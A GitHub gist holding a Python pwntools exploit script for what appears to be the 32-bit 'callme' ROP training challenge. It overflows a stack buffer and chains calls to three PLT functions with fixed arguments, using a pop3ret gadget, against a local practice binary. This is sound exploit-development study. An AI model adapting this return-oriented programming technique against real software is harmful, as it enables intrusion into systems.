Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
callme32
#!/usr/bin/env python
from pwn import *
context(os="linux", arch="i386")
def main():
conn = process('./callme32')
argument = "\x01\x00\x00\x00" + \
"\x02\x00\x00\x00" + \
"\x03\x00\x00\x00" # 1, 2, 3
# ROP Chain
payload = ''
payload += 'A' * 44
payload += "\xc0\x85\x04\x08" # callme_one@plt
payload += "\xa9\x88\x04\x08" # pop3ret (return addr)
payload += argument # callme_one(1, 2, 3)
payload += "\x20\x86\x04\x08" # callme_two@plt
payload += "\xa9\x88\x04\x08" # pop3ret
payload += argument
payload += "\xb0\x85\x04\x08" # calle_three@plt
payload += 'A' * 4 # padding
payload += argument
payload += '\n'
print conn.recv(100)
conn.send(payload)
print conn.recv(100)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.